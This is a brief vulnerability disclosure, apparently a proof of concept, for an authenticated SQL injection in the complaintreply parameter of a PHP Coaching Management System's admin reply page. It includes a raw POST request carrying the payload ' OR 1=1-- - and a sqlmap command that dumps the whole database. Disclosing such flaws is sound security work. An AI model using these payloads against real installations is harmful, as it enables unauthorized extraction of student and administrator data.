
Proof of concept for authenticated SQL injection in Coaching Management System, demonstrating database dump via unsanitized complaintreply parameter.
A SQL Injection vulnerability exists in the Coaching Management System in PHP. The complaintreply parameter in the admin reply functionality is not properly sanitized before being used in SQL queries. An authenticated attacker (Admin) can inject malicious SQL queries, leading to full database extraction.
/cims/modules/admin/reply.phpcomplaintreplycode-projects.org
Coaching Management System in PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/
Unknown (Tested on latest available version as of April 2026)
Student submits complaint 
Admin opens complaint and accesses reply feature
POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded
complaintreply=' OR 1=1-- -&submit=submit

Intercept request via Burp Suite 
Inject payload:
'

SQL error observed
7. Confirm injection:
' OR 1=1-- -

Dump database using:
sqlmap -r sqli.txt --dump

Severity: CRITICAL